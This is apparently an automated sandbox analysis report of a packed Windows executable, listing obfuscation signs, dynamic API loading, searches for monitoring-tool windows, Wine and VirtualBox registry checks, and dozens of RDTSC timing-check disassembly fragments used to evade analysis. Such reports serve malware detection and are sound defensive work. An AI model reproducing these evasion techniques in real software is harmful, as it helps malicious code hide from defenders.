Source: file.exe Static PE information: Raw size of quxdhurw is bigger than: 0x100000 < 0x196800

Data Obfuscation
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.fb0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;quxdhurw:EW;mjwebezn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;quxdhurw:EW;mjwebezn:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FD6390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1b0d03 should be: 0x1b3017
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: quxdhurw
              Source: file.exeStatic PE information: section name: mjwebezn
              Source: file.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01483142 push 40AEECD8h; mov dword ptr [esp], esi | 0_2_01483171
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013E891E push ecx; mov dword ptr [esp], ebx | 0_2_013E895A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013F4911 push ecx; mov dword ptr [esp], edx | 0_2_013F4935
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013E7965 push ebx; mov dword ptr [esp], 7DE76277h | 0_2_013E7989
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013E7965 push esi; mov dword ptr [esp], 7FDF2EE6h | 0_2_013E79BE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013E7965 push esi; mov dword ptr [esp], ecx | 0_2_013E79DA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013E7965 push 7AF4554Fh; mov dword ptr [esp], esi | 0_2_013E79F9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FD7895 push ecx; ret | 0_2_00FD78A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0141692A push edi; mov dword ptr [esp], esi | 0_2_0141692E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012D69A0 push ebp; mov dword ptr [esp], edx | 0_2_012D69BB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012D69A0 push 23BBFA70h; mov dword ptr [esp], ebx | 0_2_012D69F4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012D69A0 push edi; mov dword ptr [esp], ebx | 0_2_012D6ADD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0120098C push 49889E4Eh; mov dword ptr [esp], edi | 0_2_01201323
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0120098C push ebp; mov dword ptr [esp], 3C638500h | 0_2_01201327
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_014009FE push esi; mov dword ptr [esp], eax | 0_2_01400A1C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0129C1EE push ebx; mov dword ptr [esp], eax | 0_2_0129C28F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0129C1EE push 7B4A894Dh; mov dword ptr [esp], eax | 0_2_0129C29F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0129C1EE push 4058D30Fh; mov dword ptr [esp], ebx | 0_2_0129C2FC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0129C1EE push ecx; mov dword ptr [esp], 77FCE2ACh | 0_2_0129C343
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0129C1EE push 0ED8C5A3h; mov dword ptr [esp], ebp | 0_2_0129C3ED
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0129C1EE push eax; mov dword ptr [esp], esi | 0_2_0129C483
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013A71CC push 3351E752h; mov dword ptr [esp], eax | 0_2_013A71EA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012271D5 push 17ED1589h; mov dword ptr [esp], ebx | 0_2_01227267
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012271D5 push 54786F3Bh; mov dword ptr [esp], eax | 0_2_01227284
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012271D5 push ebp; mov dword ptr [esp], 0E1C59D5h | 0_2_01227288
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012271D5 push ebx; mov dword ptr [esp], 7BFF97FDh | 0_2_01227293
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012271D5 push edx; mov dword ptr [esp], 5518639Dh | 0_2_01227320
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012CB022 push esi; mov dword ptr [esp], ecx | 0_2_012CB04C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012CB022 push 2BB2369Eh; mov dword ptr [esp], ebp | 0_2_012CB0C2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012CB022 push edx; mov dword ptr [esp], ebp | 0_2_012CB0D9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012CB022 push eax; mov dword ptr [esp], 5B40D470h | 0_2_012CB0F2
Source: file.exe | Static PE information: section name: quxdhurw entropy: 7.9529360698674845

              Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

              Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-25265
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1200245 second address: 120024C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1378E89 second address: 1378E8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1378E8D second address: 1378E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 136D07C second address: 136D08B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F437936CE26h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1377E84 second address: 1377E88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1377E88 second address: 1377EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F437936CE36h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F437936CE34h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13785CB second address: 13785E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4379279206h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137AE9A second address: 137AEA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137AF77 second address: 137AFAA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edi 0x0000000d jmp 00007F43792791FBh 0x00000012 pop edi 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 jmp 00007F43792791FFh 0x0000001b push eax 0x0000001c push edx 0x0000001d jc 00007F43792791F6h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137AFAA second address: 137AFE3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F437936CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jnp 00007F437936CE32h 0x00000015 pop eax 0x00000016 sub ecx, 265FB444h 0x0000001c lea ebx, dword ptr [ebp+1244ED9Ah] 0x00000022 mov ecx, dword ptr [ebp+122D2BF4h] 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137B047 second address: 137B04C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137B04C second address: 137B0F1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F437936CE2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F437936CE34h 0x00000010 nop 0x00000011 add dword ptr [ebp+122D1BE7h], ecx 0x00000017 push 00000000h 0x00000019 push 02C81B80h 0x0000001e pushad 0x0000001f jg 00007F437936CE28h 0x00000025 pushad 0x00000026 popad 0x00000027 pushad 0x00000028 jmp 00007F437936CE32h 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 popad 0x00000031 xor dword ptr [esp], 02C81B00h 0x00000038 jnl 00007F437936CE29h 0x0000003e mov edx, dword ptr [ebp+122D2B2Ch] 0x00000044 push 00000003h 0x00000046 movzx ecx, ax 0x00000049 push 00000000h 0x0000004b push 00000003h 0x0000004d jmp 00007F437936CE30h 0x00000052 call 00007F437936CE29h 0x00000057 push eax 0x00000058 jmp 00007F437936CE2Dh 0x0000005d pop eax 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push edi 0x00000062 jg 00007F437936CE26h 0x00000068 pop edi 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137B0F1 second address: 137B13D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4379279209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push ebx 0x0000000e jmp 00007F4379279204h 0x00000013 pop ebx 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 pushad 0x00000018 je 00007F43792791F6h 0x0000001e push edx 0x0000001f pop edx 0x00000020 popad 0x00000021 jbe 00007F43792791FCh 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137B13D second address: 137B159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F437936CE31h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137B159 second address: 137B1A3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F43792791FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b or si, 5320h 0x00000010 lea ebx, dword ptr [ebp+1244EDA3h] 0x00000016 mov edi, ebx 0x00000018 js 00007F4379279212h 0x0000001e push eax 0x0000001f jg 00007F43792791FEh 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137B213 second address: 137B21D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137B21D second address: 137B221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137B221 second address: 137B225 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137B225 second address: 137B23B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43792791FAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137B23B second address: 137B241 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137B241 second address: 137B251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43792791FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139B801 second address: 139B80C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1399590 second address: 139959C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnc 00007F43792791F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139959C second address: 13995A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1399728 second address: 139972C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1399A7B second address: 1399A7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1399BB8 second address: 1399BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1399BBC second address: 1399BC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1399BC0 second address: 1399BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1399BCA second address: 1399BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1399BCE second address: 1399BEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4379279200h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnp 00007F43792791F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1399FD7 second address: 1399FF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F437936CE35h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1399FF0 second address: 1399FFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F43792791FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1399FFE second address: 139A00E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jnl 00007F4379371466h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139A00E second address: 139A02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F437936CE2Dh 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c jmp 00007F437936CE2Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139A02F second address: 139A04B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4379371478h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139A166 second address: 139A16E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139A4BD second address: 139A4E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4379371466h 0x0000000a jl 00007F4379371466h 0x00000010 popad 0x00000011 jmp 00007F4379371476h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13705D7 second address: 1370612 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F437936CE2Eh 0x0000000b pushad 0x0000000c jmp 00007F437936CE31h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F437936CE2Bh 0x0000001a popad 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139B075 second address: 139B0A0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jmp 00007F437937146Bh 0x0000000c jmp 00007F4379371475h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139EAB4 second address: 139EABA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139D315 second address: 139D319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A0D5D second address: 13A0D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jg 00007F437936CE26h 0x0000000e pop ebx 0x0000000f jbe 00007F437936CE2Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 136305F second address: 1363063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1363063 second address: 1363073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F437936CE26h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1363073 second address: 1363077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A7085 second address: 13A708A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A708A second address: 13A7094 instructions: 0x00000000 rdtsc 0x00000002 js 00007F437937147Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A7094 second address: 13A70C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F437936CE32h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F437936CE37h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A70C6 second address: 13A70DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4379371473h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A6848 second address: 13A6858 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F437936CE2Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A69A8 second address: 13A69AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A6C48 second address: 13A6C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A6D74 second address: 13A6D7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A6D7A second address: 13A6DC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007F437936CE26h 0x0000000b jmp 00007F437936CE36h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F437936CE34h 0x0000001a js 00007F437936CE2Eh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A6EFE second address: 13A6F0D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4379371466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A6F0D second address: 13A6F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F437936CE2Ch 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A8382 second address: 13A8393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F4379371466h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A8456 second address: 13A845C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A845C second address: 13A846F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F437937146Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A846F second address: 13A84AE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F437936CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push edx 0x00000010 jbe 00007F437936CE28h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 pop edx 0x00000019 mov eax, dword ptr [eax] 0x0000001b jmp 00007F437936CE32h 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 js 00007F437936CE2Ch 0x0000002c jng 00007F437936CE26h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A8C94 second address: 13A8CBC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F4379371477h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f jne 00007F4379371466h 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A9619 second address: 13A961D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A961D second address: 13A9639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F437937146Ch 0x00000016 jc 00007F4379371466h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A9639 second address: 13A9644 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F437936CE26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A9726 second address: 13A9736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F4379371466h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A97BA second address: 13A97BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A97BE second address: 13A97C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A97C4 second address: 13A97CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A97CA second address: 13A97CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A9CCF second address: 13A9CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
